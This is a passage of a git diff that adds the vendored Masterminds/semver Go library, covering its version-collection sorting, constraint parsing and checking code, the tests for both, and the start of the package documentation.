+func (c Collection) Len() int {
+ return len(c)
+}
+
+// Less is needed for the sort interface to compare two Version objects on the
+// slice. It checks if one is less than the other.
+func (c Collection) Less(i, j int) bool {
+ return c[i].LessThan(c[j])
+}
+
+// Swap is needed for the sort interface to replace the Version objects
+// at two different positions in the slice.
+func (c Collection) Swap(i, j int) {
+ c[i], c[j] = c[j], c[i]
+}
diff --git a/vendor/github.com/Masterminds/semver/collection_test.go b/vendor/github.com/Masterminds/semver/collection_test.go
new file mode 100644
index 0000000000..71b909c4e0
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/collection_test.go
@@ -0,0 +1,46 @@
+package semver
+
+import (
+ "reflect"
+ "sort"
+ "testing"
+)
+
+func TestCollection(t *testing.T) {
+ raw := []string{
+ "1.2.3",
+ "1.0",
+ "1.3",
+ "2",
+ "0.4.2",
+ }
+
+ vs := make([]*Version, len(raw))
+ for i, r := range raw {
+ v, err := NewVersion(r)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ vs[i] = v
+ }
+
+ sort.Sort(Collection(vs))
+
+ e := []string{
+ "0.4.2",
+ "1.0.0",
+ "1.2.3",
+ "1.3.0",
+ "2.0.0",
+ }
+
+ a := make([]string, len(vs))
+ for i, v := range vs {
+ a[i] = v.String()
+ }
+
+ if !reflect.DeepEqual(a, e) {
+ t.Error("Sorting Collection failed")
+ }
+}
diff --git a/vendor/github.com/Masterminds/semver/constraints.go b/vendor/github.com/Masterminds/semver/constraints.go
new file mode 100644
index 0000000000..a41a6a7a4a
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/constraints.go
@@ -0,0 +1,426 @@
+package semver
+
+import (
+ "errors"
+ "fmt"
+ "regexp"
+ "strings"
+)
+
+// Constraints is one or more constraint that a semantic version can be
+// checked against.
+type Constraints struct {
+ constraints [][]*constraint
+}
+
+// NewConstraint returns a Constraints instance that a Version instance can
+// be checked against. If there is a parse error it will be returned.
+func NewConstraint(c string) (*Constraints, error) {
+
+ // Rewrite - ranges into a comparison operation.
+ c = rewriteRange(c)
+
+ ors := strings.Split(c, "||")
+ or := make([][]*constraint, len(ors))
+ for k, v := range ors {
+ cs := strings.Split(v, ",")
+ result := make([]*constraint, len(cs))
+ for i, s := range cs {
+ pc, err := parseConstraint(s)
+ if err != nil {
+ return nil, err
+ }
+
+ result[i] = pc
+ }
+ or[k] = result
+ }
+
+ o := &Constraints{constraints: or}
+ return o, nil
+}
+
+// Check tests if a version satisfies the constraints.
+func (cs Constraints) Check(v *Version) bool {
+ // loop over the ORs and check the inner ANDs
+ for _, o := range cs.constraints {
+ joy := true
+ for _, c := range o {
+ if !c.check(v) {
+ joy = false
+ break
+ }
+ }
+
+ if joy {
+ return true
+ }
+ }
+
+ return false
+}
+
+// Validate checks if a version satisfies a constraint. If not, a slice of
+// reasons for the failure is returned in addition to a bool.
+func (cs Constraints) Validate(v *Version) (bool, []error) {
+ // loop over the ORs and check the inner ANDs
+ var e []error
+ for _, o := range cs.constraints {
+ joy := true
+ for _, c := range o {
+ if !c.check(v) {
+ em := fmt.Errorf(c.msg, v, c.orig)
+ e = append(e, em)
+ joy = false
+ }
+ }
+
+ if joy {
+ return true, []error{}
+ }
+ }
+
+ return false, e
+}
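+
+// A minimal usage sketch for Validate (an illustrative note added here; not
+// upstream documentation):
+//
+//	cs, _ := NewConstraint(">= 1.1, < 2")
+//	v, _ := NewVersion("2.5.0")
+//	ok, errs := cs.Validate(v) // ok == false; errs explains each failed check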
+
+var constraintOps map[string]cfunc
+var constraintMsg map[string]string
+var constraintRegex *regexp.Regexp
+
+func init() {
+ constraintOps = map[string]cfunc{
+ "": constraintTildeOrEqual,
+ "=": constraintTildeOrEqual,
+ "!=": constraintNotEqual,
+ ">": constraintGreaterThan,
+ "<": constraintLessThan,
+ ">=": constraintGreaterThanEqual,
+ "=>": constraintGreaterThanEqual,
+ "<=": constraintLessThanEqual,
+ "=<": constraintLessThanEqual,
+ "~": constraintTilde,
+ "~>": constraintTilde,
+ "^": constraintCaret,
+ }
+
+ constraintMsg = map[string]string{
+ "": "%s is not equal to %s",
+ "=": "%s is not equal to %s",
+ "!=": "%s is equal to %s",
+ ">": "%s is less than or equal to %s",
+ "<": "%s is greater than or equal to %s",
+ ">=": "%s is less than %s",
+ "=>": "%s is less than %s",
+ "<=": "%s is greater than %s",
+ "=<": "%s is greater than %s",
+ "~": "%s does not have same major and minor version as %s",
+ "~>": "%s does not have same major and minor version as %s",
+ "^": "%s does not have same major version as %s",
+ }
+
+ ops := make([]string, 0, len(constraintOps))
+ for k := range constraintOps {
+ ops = append(ops, regexp.QuoteMeta(k))
+ }
+
+ constraintRegex = regexp.MustCompile(fmt.Sprintf(
+ `^\s*(%s)\s*(%s)\s*$`,
+ strings.Join(ops, "|"),
+ cvRegex))
+
+ constraintRangeRegex = regexp.MustCompile(fmt.Sprintf(
+ `\s*(%s)\s+-\s+(%s)\s*`,
+ cvRegex, cvRegex))
+}
+
+// An individual constraint
+type constraint struct {
+	// The callback function for the constraint. It performs the logic for
+	// the constraint.
+ function cfunc
+
+ msg string
+
+	// The version used in the constraint check. For example, if a constraint
+	// is '<= 2.0.0' then con holds a Version instance representing 2.0.0.
+ con *Version
+
+ // The original parsed version (e.g., 4.x from != 4.x)
+ orig string
+
+ // When an x is used as part of the version (e.g., 1.x)
+ minorDirty bool
+ dirty bool
+ patchDirty bool
+}
+
+// Check if a version meets the constraint
+func (c *constraint) check(v *Version) bool {
+ return c.function(v, c)
+}
+
+type cfunc func(v *Version, c *constraint) bool
+
+func parseConstraint(c string) (*constraint, error) {
+ m := constraintRegex.FindStringSubmatch(c)
+ if m == nil {
+ return nil, fmt.Errorf("improper constraint: %s", c)
+ }
+
+ ver := m[2]
+ orig := ver
+ minorDirty := false
+ patchDirty := false
+ dirty := false
+ if isX(m[3]) {
+ ver = "0.0.0"
+ dirty = true
+ } else if isX(strings.TrimPrefix(m[4], ".")) || m[4] == "" {
+ minorDirty = true
+ dirty = true
+ ver = fmt.Sprintf("%s.0.0%s", m[3], m[6])
+ } else if isX(strings.TrimPrefix(m[5], ".")) {
+ dirty = true
+ patchDirty = true
+ ver = fmt.Sprintf("%s%s.0%s", m[3], m[4], m[6])
+ }
+
+ con, err := NewVersion(ver)
+ if err != nil {
+
+ // The constraintRegex should catch any regex parsing errors. So,
+ // we should never get here.
+ return nil, errors.New("constraint Parser Error")
+ }
+
+ cs := &constraint{
+ function: constraintOps[m[1]],
+ msg: constraintMsg[m[1]],
+ con: con,
+ orig: orig,
+ minorDirty: minorDirty,
+ patchDirty: patchDirty,
+ dirty: dirty,
+ }
+ return cs, nil
+}
+
+// Constraint functions
+func constraintNotEqual(v *Version, c *constraint) bool {
+ if c.dirty {
+
+ // If there is a pre-release on the version but the constraint isn't looking
+ // for them assume that pre-releases are not compatible. See issue 21 for
+ // more details.
+ if v.Prerelease() != "" && c.con.Prerelease() == "" {
+ return false
+ }
+
+ if c.con.Major() != v.Major() {
+ return true
+ }
+ if c.con.Minor() != v.Minor() && !c.minorDirty {
+ return true
+ } else if c.minorDirty {
+ return false
+ }
+
+ return false
+ }
+
+ return !v.Equal(c.con)
+}
+
+func constraintGreaterThan(v *Version, c *constraint) bool {
+
+	// An edge case exists where the constraint is 0.0.0 and the version is
+	// 0.0.0-someprerelease. This handles that case.
+ if !isNonZero(c.con) && isNonZero(v) {
+ return true
+ }
+
+ // If there is a pre-release on the version but the constraint isn't looking
+ // for them assume that pre-releases are not compatible. See issue 21 for
+ // more details.
+ if v.Prerelease() != "" && c.con.Prerelease() == "" {
+ return false
+ }
+
+ return v.Compare(c.con) == 1
+}
+
+func constraintLessThan(v *Version, c *constraint) bool {
+ // If there is a pre-release on the version but the constraint isn't looking
+ // for them assume that pre-releases are not compatible. See issue 21 for
+ // more details.
+ if v.Prerelease() != "" && c.con.Prerelease() == "" {
+ return false
+ }
+
+ if !c.dirty {
+ return v.Compare(c.con) < 0
+ }
+
+ if v.Major() > c.con.Major() {
+ return false
+ } else if v.Minor() > c.con.Minor() && !c.minorDirty {
+ return false
+ }
+
+ return true
+}
+
+func constraintGreaterThanEqual(v *Version, c *constraint) bool {
+	// An edge case exists where the constraint is 0.0.0 and the version is
+	// 0.0.0-someprerelease. This handles that case.
+ if !isNonZero(c.con) && isNonZero(v) {
+ return true
+ }
+
+ // If there is a pre-release on the version but the constraint isn't looking
+ // for them assume that pre-releases are not compatible. See issue 21 for
+ // more details.
+ if v.Prerelease() != "" && c.con.Prerelease() == "" {
+ return false
+ }
+
+ return v.Compare(c.con) >= 0
+}
+
+func constraintLessThanEqual(v *Version, c *constraint) bool {
+ // If there is a pre-release on the version but the constraint isn't looking
+ // for them assume that pre-releases are not compatible. See issue 21 for
+ // more details.
+ if v.Prerelease() != "" && c.con.Prerelease() == "" {
+ return false
+ }
+
+ if !c.dirty {
+ return v.Compare(c.con) <= 0
+ }
+
+ if v.Major() > c.con.Major() {
+ return false
+ } else if v.Minor() > c.con.Minor() && !c.minorDirty {
+ return false
+ }
+
+ return true
+}
+
+// ~*, ~>* --> >= 0.0.0 (any)
+// ~2, ~2.x, ~2.x.x, ~>2, ~>2.x ~>2.x.x --> >=2.0.0, <3.0.0
+// ~2.0, ~2.0.x, ~>2.0, ~>2.0.x --> >=2.0.0, <2.1.0
+// ~1.2, ~1.2.x, ~>1.2, ~>1.2.x --> >=1.2.0, <1.3.0
+// ~1.2.3, ~>1.2.3 --> >=1.2.3, <1.3.0
+// ~1.2.0, ~>1.2.0 --> >=1.2.0, <1.3.0
+func constraintTilde(v *Version, c *constraint) bool {
+ // If there is a pre-release on the version but the constraint isn't looking
+ // for them assume that pre-releases are not compatible. See issue 21 for
+ // more details.
+ if v.Prerelease() != "" && c.con.Prerelease() == "" {
+ return false
+ }
+
+ if v.LessThan(c.con) {
+ return false
+ }
+
+ // ~0.0.0 is a special case where all constraints are accepted. It's
+ // equivalent to >= 0.0.0.
+ if c.con.Major() == 0 && c.con.Minor() == 0 && c.con.Patch() == 0 &&
+ !c.minorDirty && !c.patchDirty {
+ return true
+ }
+
+ if v.Major() != c.con.Major() {
+ return false
+ }
+
+ if v.Minor() != c.con.Minor() && !c.minorDirty {
+ return false
+ }
+
+ return true
+}
+
+// When there is a .x (dirty) status it automatically opts in to ~. Otherwise
+// it's a straight =
+func constraintTildeOrEqual(v *Version, c *constraint) bool {
+ // If there is a pre-release on the version but the constraint isn't looking
+ // for them assume that pre-releases are not compatible. See issue 21 for
+ // more details.
+ if v.Prerelease() != "" && c.con.Prerelease() == "" {
+ return false
+ }
+
+ if c.dirty {
+ c.msg = constraintMsg["~"]
+ return constraintTilde(v, c)
+ }
+
+ return v.Equal(c.con)
+}
+
+// ^* --> (any)
+// ^2, ^2.x, ^2.x.x --> >=2.0.0, <3.0.0
+// ^2.0, ^2.0.x --> >=2.0.0, <3.0.0
+// ^1.2, ^1.2.x --> >=1.2.0, <2.0.0
+// ^1.2.3 --> >=1.2.3, <2.0.0
+// ^1.2.0 --> >=1.2.0, <2.0.0
+func constraintCaret(v *Version, c *constraint) bool {
+ // If there is a pre-release on the version but the constraint isn't looking
+ // for them assume that pre-releases are not compatible. See issue 21 for
+ // more details.
+ if v.Prerelease() != "" && c.con.Prerelease() == "" {
+ return false
+ }
+
+ if v.LessThan(c.con) {
+ return false
+ }
+
+ if v.Major() != c.con.Major() {
+ return false
+ }
+
+ return true
+}
+
+var constraintRangeRegex *regexp.Regexp
+
+const cvRegex string = `v?([0-9|x|X|\*]+)(\.[0-9|x|X|\*]+)?(\.[0-9|x|X|\*]+)?` +
+ `(-([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?` +
+ `(\+([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?`
+
+func isX(x string) bool {
+ switch x {
+ case "x", "*", "X":
+ return true
+ default:
+ return false
+ }
+}
+
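+// rewriteRange rewrites a hyphen range into explicit comparisons; for
+// example, "1.1 - 2" becomes ">= 1.1, <= 2" (see TestRewriteRange).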
+func rewriteRange(i string) string {
+ m := constraintRangeRegex.FindAllStringSubmatch(i, -1)
+ if m == nil {
+ return i
+ }
+ o := i
+ for _, v := range m {
+ t := fmt.Sprintf(">= %s, <= %s", v[1], v[11])
+ o = strings.Replace(o, v[0], t, 1)
+ }
+
+ return o
+}
+
+// Detect if a version is not zero (0.0.0)
+func isNonZero(v *Version) bool {
+ if v.Major() != 0 || v.Minor() != 0 || v.Patch() != 0 || v.Prerelease() != "" {
+ return true
+ }
+
+ return false
+}
diff --git a/vendor/github.com/Masterminds/semver/constraints_test.go b/vendor/github.com/Masterminds/semver/constraints_test.go
new file mode 100644
index 0000000000..bf52c90bd2
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/constraints_test.go
@@ -0,0 +1,465 @@
+package semver
+
+import (
+ "reflect"
+ "testing"
+)
+
+func TestParseConstraint(t *testing.T) {
+ tests := []struct {
+ in string
+ f cfunc
+ v string
+ err bool
+ }{
+ {">= 1.2", constraintGreaterThanEqual, "1.2.0", false},
+ {"1.0", constraintTildeOrEqual, "1.0.0", false},
+ {"foo", nil, "", true},
+ {"<= 1.2", constraintLessThanEqual, "1.2.0", false},
+ {"=< 1.2", constraintLessThanEqual, "1.2.0", false},
+ {"=> 1.2", constraintGreaterThanEqual, "1.2.0", false},
+ {"v1.2", constraintTildeOrEqual, "1.2.0", false},
+ {"=1.5", constraintTildeOrEqual, "1.5.0", false},
+ {"> 1.3", constraintGreaterThan, "1.3.0", false},
+ {"< 1.4.1", constraintLessThan, "1.4.1", false},
+ }
+
+ for _, tc := range tests {
+ c, err := parseConstraint(tc.in)
+ if tc.err && err == nil {
+ t.Errorf("Expected error for %s didn't occur", tc.in)
+ } else if !tc.err && err != nil {
+ t.Errorf("Unexpected error for %s", tc.in)
+ }
+
+ // If an error was expected continue the loop and don't try the other
+ // tests as they will cause errors.
+ if tc.err {
+ continue
+ }
+
+ if tc.v != c.con.String() {
+ t.Errorf("Incorrect version found on %s", tc.in)
+ }
+
+ f1 := reflect.ValueOf(tc.f)
+ f2 := reflect.ValueOf(c.function)
+ if f1 != f2 {
+ t.Errorf("Wrong constraint found for %s", tc.in)
+ }
+ }
+}
+
+func TestConstraintCheck(t *testing.T) {
+ tests := []struct {
+ constraint string
+ version string
+ check bool
+ }{
+ {"= 2.0", "1.2.3", false},
+ {"= 2.0", "2.0.0", true},
+ {"4.1", "4.1.0", true},
+ {"!=4.1", "4.1.0", false},
+ {"!=4.1", "5.1.0", true},
+ {">1.1", "4.1.0", true},
+ {">1.1", "1.1.0", false},
+ {"<1.1", "0.1.0", true},
+ {"<1.1", "1.1.0", false},
+ {"<1.1", "1.1.1", false},
+ {">=1.1", "4.1.0", true},
+ {">=1.1", "1.1.0", true},
+ {">=1.1", "0.0.9", false},
+ {"<=1.1", "0.1.0", true},
+ {"<=1.1", "1.1.0", true},
+ {"<=1.1", "1.1.1", false},
+ {">0", "0.0.1-alpha", true},
+ {">=0", "0.0.1-alpha", true},
+ {">0", "0", false},
+ {">=0", "0", true},
+ {"=0", "1", false},
+ }
+
+ for _, tc := range tests {
+ c, err := parseConstraint(tc.constraint)
+ if err != nil {
+ t.Errorf("err: %s", err)
+ continue
+ }
+
+ v, err := NewVersion(tc.version)
+ if err != nil {
+ t.Errorf("err: %s", err)
+ continue
+ }
+
+ a := c.check(v)
+ if a != tc.check {
+ t.Errorf("Constraint %q failing with %q", tc.constraint, tc.version)
+ }
+ }
+}
+
+func TestNewConstraint(t *testing.T) {
+ tests := []struct {
+ input string
+ ors int
+ count int
+ err bool
+ }{
+ {">= 1.1", 1, 1, false},
+ {"2.0", 1, 1, false},
+ {"v2.3.5-20161202202307-sha.e8fc5e5", 1, 1, false},
+ {">= bar", 0, 0, true},
+ {">= 1.2.3, < 2.0", 1, 2, false},
+ {">= 1.2.3, < 2.0 || => 3.0, < 4", 2, 2, false},
+
+ // The 3 - 4 should be broken into 2 by the range rewriting
+ {"3 - 4 || => 3.0, < 4", 2, 2, false},
+ }
+
+ for _, tc := range tests {
+ v, err := NewConstraint(tc.input)
+ if tc.err && err == nil {
+ t.Errorf("expected but did not get error for: %s", tc.input)
+ continue
+ } else if !tc.err && err != nil {
+			t.Errorf("unexpected error for input %s: %s", tc.input, err)
+ continue
+ }
+ if tc.err {
+ continue
+ }
+
+ l := len(v.constraints)
+ if tc.ors != l {
+ t.Errorf("Expected %s to have %d ORs but got %d",
+ tc.input, tc.ors, l)
+ }
+
+ l = len(v.constraints[0])
+ if tc.count != l {
+ t.Errorf("Expected %s to have %d constraints but got %d",
+ tc.input, tc.count, l)
+ }
+ }
+}
+
+func TestConstraintsCheck(t *testing.T) {
+ tests := []struct {
+ constraint string
+ version string
+ check bool
+ }{
+ {"*", "1.2.3", true},
+ {"~0.0.0", "1.2.3", true},
+ {"0.x.x", "1.2.3", false},
+ {"0.0.x", "1.2.3", false},
+ {"0.0.0", "1.2.3", false},
+ {"*", "1.2.3", true},
+ {"^0.0.0", "1.2.3", false},
+ {"= 2.0", "1.2.3", false},
+ {"= 2.0", "2.0.0", true},
+ {"4.1", "4.1.0", true},
+ {"4.1.x", "4.1.3", true},
+ {"1.x", "1.4", true},
+ {"!=4.1", "4.1.0", false},
+ {"!=4.1-alpha", "4.1.0-alpha", false},
+ {"!=4.1-alpha", "4.1.0", true},
+ {"!=4.1", "5.1.0", true},
+ {"!=4.x", "5.1.0", true},
+ {"!=4.x", "4.1.0", false},
+ {"!=4.1.x", "4.2.0", true},
+ {"!=4.2.x", "4.2.3", false},
+ {">1.1", "4.1.0", true},
+ {">1.1", "1.1.0", false},
+ {"<1.1", "0.1.0", true},
+ {"<1.1", "1.1.0", false},
+ {"<1.1", "1.1.1", false},
+ {"<1.x", "1.1.1", true},
+ {"<1.x", "2.1.1", false},
+ {"<1.1.x", "1.2.1", false},
+ {"<1.1.x", "1.1.500", true},
+ {"<1.2.x", "1.1.1", true},
+ {">=1.1", "4.1.0", true},
+ {">=1.1", "4.1.0-beta", false},
+ {">=1.1", "1.1.0", true},
+ {">=1.1", "0.0.9", false},
+ {"<=1.1", "0.1.0", true},
+ {"<=1.1", "0.1.0-alpha", false},
+ {"<=1.1-a", "0.1.0-alpha", true},
+ {"<=1.1", "1.1.0", true},
+ {"<=1.x", "1.1.0", true},
+ {"<=2.x", "3.1.0", false},
+ {"<=1.1", "1.1.1", false},
+ {"<=1.1.x", "1.2.500", false},
+ {">1.1, <2", "1.1.1", true},
+ {">1.1, <3", "4.3.2", false},
+ {">=1.1, <2, !=1.2.3", "1.2.3", false},
+ {">=1.1, <2, !=1.2.3 || > 3", "3.1.2", true},
+ {">=1.1, <2, !=1.2.3 || >= 3", "3.0.0", true},
+ {">=1.1, <2, !=1.2.3 || > 3", "3.0.0", false},
+ {">=1.1, <2, !=1.2.3 || > 3", "1.2.3", false},
+ {"1.1 - 2", "1.1.1", true},
+ {"1.1-3", "4.3.2", false},
+ {"^1.1", "1.1.1", true},
+ {"^1.1", "4.3.2", false},
+ {"^1.x", "1.1.1", true},
+ {"^2.x", "1.1.1", false},
+ {"^1.x", "2.1.1", false},
+ {"^1.x", "1.1.1-beta1", false},
+ {"^1.1.2-alpha", "1.2.1-beta1", true},
+ {"^1.2.x-alpha", "1.1.1-beta1", false},
+ {"~*", "2.1.1", true},
+ {"~1", "2.1.1", false},
+ {"~1", "1.3.5", true},
+ {"~1", "1.4", true},
+ {"~1.x", "2.1.1", false},
+ {"~1.x", "1.3.5", true},
+ {"~1.x", "1.4", true},
+ {"~1.1", "1.1.1", true},
+ {"~1.1", "1.1.1-alpha", false},
+ {"~1.1-alpha", "1.1.1-beta", true},
+ {"~1.1.1-beta", "1.1.1-alpha", false},
+ {"~1.1.1-beta", "1.1.1", true},
+ {"~1.2.3", "1.2.5", true},
+ {"~1.2.3", "1.2.2", false},
+ {"~1.2.3", "1.3.2", false},
+ {"~1.1", "1.2.3", false},
+ {"~1.3", "2.4.5", false},
+ }
+
+ for _, tc := range tests {
+ c, err := NewConstraint(tc.constraint)
+ if err != nil {
+ t.Errorf("err: %s", err)
+ continue
+ }
+
+ v, err := NewVersion(tc.version)
+ if err != nil {
+ t.Errorf("err: %s", err)
+ continue
+ }
+
+ a := c.Check(v)
+ if a != tc.check {
+ t.Errorf("Constraint '%s' failing with '%s'", tc.constraint, tc.version)
+ }
+ }
+}
+
+func TestRewriteRange(t *testing.T) {
+ tests := []struct {
+ c string
+ nc string
+ }{
+ {"2 - 3", ">= 2, <= 3"},
+ {"2 - 3, 2 - 3", ">= 2, <= 3,>= 2, <= 3"},
+ {"2 - 3, 4.0.0 - 5.1", ">= 2, <= 3,>= 4.0.0, <= 5.1"},
+ }
+
+ for _, tc := range tests {
+ o := rewriteRange(tc.c)
+
+ if o != tc.nc {
+ t.Errorf("Range %s rewritten incorrectly as '%s'", tc.c, o)
+ }
+ }
+}
+
+func TestIsX(t *testing.T) {
+ tests := []struct {
+ t string
+ c bool
+ }{
+ {"A", false},
+ {"%", false},
+ {"X", true},
+ {"x", true},
+ {"*", true},
+ }
+
+ for _, tc := range tests {
+ a := isX(tc.t)
+ if a != tc.c {
+ t.Errorf("Function isX error on %s", tc.t)
+ }
+ }
+}
+
+func TestConstraintsValidate(t *testing.T) {
+ tests := []struct {
+ constraint string
+ version string
+ check bool
+ }{
+ {"*", "1.2.3", true},
+ {"~0.0.0", "1.2.3", true},
+ {"= 2.0", "1.2.3", false},
+ {"= 2.0", "2.0.0", true},
+ {"4.1", "4.1.0", true},
+ {"4.1.x", "4.1.3", true},
+ {"1.x", "1.4", true},
+ {"!=4.1", "4.1.0", false},
+ {"!=4.1", "5.1.0", true},
+ {"!=4.x", "5.1.0", true},
+ {"!=4.x", "4.1.0", false},
+ {"!=4.1.x", "4.2.0", true},
+ {"!=4.2.x", "4.2.3", false},
+ {">1.1", "4.1.0", true},
+ {">1.1", "1.1.0", false},
+ {"<1.1", "0.1.0", true},
+ {"<1.1", "1.1.0", false},
+ {"<1.1", "1.1.1", false},
+ {"<1.x", "1.1.1", true},
+ {"<1.x", "2.1.1", false},
+ {"<1.1.x", "1.2.1", false},
+ {"<1.1.x", "1.1.500", true},
+ {"<1.2.x", "1.1.1", true},
+ {">=1.1", "4.1.0", true},
+ {">=1.1", "1.1.0", true},
+ {">=1.1", "0.0.9", false},
+ {"<=1.1", "0.1.0", true},
+ {"<=1.1", "1.1.0", true},
+ {"<=1.x", "1.1.0", true},
+ {"<=2.x", "3.1.0", false},
+ {"<=1.1", "1.1.1", false},
+ {"<=1.1.x", "1.2.500", false},
+ {">1.1, <2", "1.1.1", true},
+ {">1.1, <3", "4.3.2", false},
+ {">=1.1, <2, !=1.2.3", "1.2.3", false},
+ {">=1.1, <2, !=1.2.3 || > 3", "3.1.2", true},
+ {">=1.1, <2, !=1.2.3 || >= 3", "3.0.0", true},
+ {">=1.1, <2, !=1.2.3 || > 3", "3.0.0", false},
+ {">=1.1, <2, !=1.2.3 || > 3", "1.2.3", false},
+ {"1.1 - 2", "1.1.1", true},
+ {"1.1-3", "4.3.2", false},
+ {"^1.1", "1.1.1", true},
+ {"^1.1", "1.1.1-alpha", false},
+ {"^1.1.1-alpha", "1.1.1-beta", true},
+ {"^1.1.1-beta", "1.1.1-alpha", false},
+ {"^1.1", "4.3.2", false},
+ {"^1.x", "1.1.1", true},
+ {"^2.x", "1.1.1", false},
+ {"^1.x", "2.1.1", false},
+ {"~*", "2.1.1", true},
+ {"~1", "2.1.1", false},
+ {"~1", "1.3.5", true},
+ {"~1", "1.3.5-beta", false},
+ {"~1.x", "2.1.1", false},
+ {"~1.x", "1.3.5", true},
+ {"~1.x", "1.3.5-beta", false},
+ {"~1.3.6-alpha", "1.3.5-beta", false},
+ {"~1.3.5-alpha", "1.3.5-beta", true},
+ {"~1.3.5-beta", "1.3.5-alpha", false},
+ {"~1.x", "1.4", true},
+ {"~1.1", "1.1.1", true},
+ {"~1.2.3", "1.2.5", true},
+ {"~1.2.3", "1.2.2", false},
+ {"~1.2.3", "1.3.2", false},
+ {"~1.1", "1.2.3", false},
+ {"~1.3", "2.4.5", false},
+ }
+
+ for _, tc := range tests {
+ c, err := NewConstraint(tc.constraint)
+ if err != nil {
+ t.Errorf("err: %s", err)
+ continue
+ }
+
+ v, err := NewVersion(tc.version)
+ if err != nil {
+ t.Errorf("err: %s", err)
+ continue
+ }
+
+ a, msgs := c.Validate(v)
+ if a != tc.check {
+ t.Errorf("Constraint '%s' failing with '%s'", tc.constraint, tc.version)
+ } else if !a && len(msgs) == 0 {
+ t.Errorf("%q failed with %q but no errors returned", tc.constraint, tc.version)
+ }
+
+ // if a == false {
+ // for _, m := range msgs {
+ // t.Errorf("%s", m)
+ // }
+ // }
+ }
+
+ v, err := NewVersion("1.2.3")
+ if err != nil {
+ t.Errorf("err: %s", err)
+ }
+
+ c, err := NewConstraint("!= 1.2.5, ^2, <= 1.1.x")
+ if err != nil {
+ t.Errorf("err: %s", err)
+ }
+
+ _, msgs := c.Validate(v)
+ if len(msgs) != 2 {
+ t.Error("Invalid number of validations found")
+ }
+ e := msgs[0].Error()
+ if e != "1.2.3 does not have same major version as 2" {
+ t.Error("Did not get expected message: 1.2.3 does not have same major version as 2")
+ }
+ e = msgs[1].Error()
+ if e != "1.2.3 is greater than 1.1.x" {
+ t.Error("Did not get expected message: 1.2.3 is greater than 1.1.x")
+ }
+
+ tests2 := []struct {
+ constraint, version, msg string
+ }{
+ {"= 2.0", "1.2.3", "1.2.3 is not equal to 2.0"},
+ {"!=4.1", "4.1.0", "4.1.0 is equal to 4.1"},
+ {"!=4.x", "4.1.0", "4.1.0 is equal to 4.x"},
+ {"!=4.2.x", "4.2.3", "4.2.3 is equal to 4.2.x"},
+ {">1.1", "1.1.0", "1.1.0 is less than or equal to 1.1"},
+ {"<1.1", "1.1.0", "1.1.0 is greater than or equal to 1.1"},
+ {"<1.1", "1.1.1", "1.1.1 is greater than or equal to 1.1"},
+ {"<1.x", "2.1.1", "2.1.1 is greater than or equal to 1.x"},
+ {"<1.1.x", "1.2.1", "1.2.1 is greater than or equal to 1.1.x"},
+ {">=1.1", "0.0.9", "0.0.9 is less than 1.1"},
+ {"<=2.x", "3.1.0", "3.1.0 is greater than 2.x"},
+ {"<=1.1", "1.1.1", "1.1.1 is greater than 1.1"},
+ {"<=1.1.x", "1.2.500", "1.2.500 is greater than 1.1.x"},
+ {">1.1, <3", "4.3.2", "4.3.2 is greater than or equal to 3"},
+ {">=1.1, <2, !=1.2.3", "1.2.3", "1.2.3 is equal to 1.2.3"},
+ {">=1.1, <2, !=1.2.3 || > 3", "3.0.0", "3.0.0 is greater than or equal to 2"},
+ {">=1.1, <2, !=1.2.3 || > 3", "1.2.3", "1.2.3 is equal to 1.2.3"},
+ {"1.1 - 3", "4.3.2", "4.3.2 is greater than 3"},
+ {"^1.1", "4.3.2", "4.3.2 does not have same major version as 1.1"},
+ {"^2.x", "1.1.1", "1.1.1 does not have same major version as 2.x"},
+ {"^1.x", "2.1.1", "2.1.1 does not have same major version as 1.x"},
+ {"~1", "2.1.2", "2.1.2 does not have same major and minor version as 1"},
+ {"~1.x", "2.1.1", "2.1.1 does not have same major and minor version as 1.x"},
+ {"~1.2.3", "1.2.2", "1.2.2 does not have same major and minor version as 1.2.3"},
+ {"~1.2.3", "1.3.2", "1.3.2 does not have same major and minor version as 1.2.3"},
+ {"~1.1", "1.2.3", "1.2.3 does not have same major and minor version as 1.1"},
+ {"~1.3", "2.4.5", "2.4.5 does not have same major and minor version as 1.3"},
+ }
+
+ for _, tc := range tests2 {
+ c, err := NewConstraint(tc.constraint)
+ if err != nil {
+ t.Errorf("err: %s", err)
+ continue
+ }
+
+ v, err := NewVersion(tc.version)
+ if err != nil {
+ t.Errorf("err: %s", err)
+ continue
+ }
+
+ _, msgs := c.Validate(v)
+ e := msgs[0].Error()
+ if e != tc.msg {
+ t.Errorf("Did not get expected message %q: %s", tc.msg, e)
+ }
+ }
+}
diff --git a/vendor/github.com/Masterminds/semver/doc.go b/vendor/github.com/Masterminds/semver/doc.go
new file mode 100644
index 0000000000..e00f65eb73
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/doc.go
@@ -0,0 +1,115 @@
+/*
+Package semver provides the ability to work with Semantic Versions (http://semver.org) in Go.
+
+Specifically it provides the ability to:
+
+ * Parse semantic versions
+ * Sort semantic versions
+ * Check if a semantic version fits within a set of constraints
+ * Optionally work with a `v` prefix
+
+Parsing Semantic Versions
+
+To parse a semantic version use the `NewVersion` function. For example,
+
+ v, err := semver.NewVersion("1.2.3-beta.1+build345")
+
+If there is an error, the version wasn't parseable. The version object has methods
+to get the parts of the version, compare it to other versions, convert the
+version back into a string, and get the original string. For more details
+please see the documentation at https://godoc.org/github.com/Masterminds/semver.
+
+Sorting Semantic Versions
+
+A set of versions can be sorted using the `sort` package from the standard library.
+For example,
+
+ raw := []string{"1.2.3", "1.0", "1.3", "2", "0.4.2",}
+ vs := make([]*semver.Version, len(raw))
+ for i, r := range raw {
+ v, err := semver.NewVersion(r)
+ if err != nil {
+            // Handle version not being parseable.
+ }
+
+ vs[i] = v
+ }
+
+ sort.Sort(semver.Collection(vs))
+
+Checking Version Constraints
+
+Checking a version against version constraints is one of the most featureful
+parts of the package.
+
+ c, err := semver.NewConstraint(">= 1.2.3")
+ if err != nil {
+ // Handle constraint not being parseable.
+ }
+
+    v, err := semver.NewVersion("1.3")
+ if err != nil {
+ // Handle version not being parseable.
+ }
+    // Check if the version meets the constraints. The variable a will be true.
+ a := c.Check(v)
+
+Basic Comparisons
+
+There are two elements to the comparisons. First, a comparison string is a list
+of comma-separated AND comparisons. These are then joined together into OR
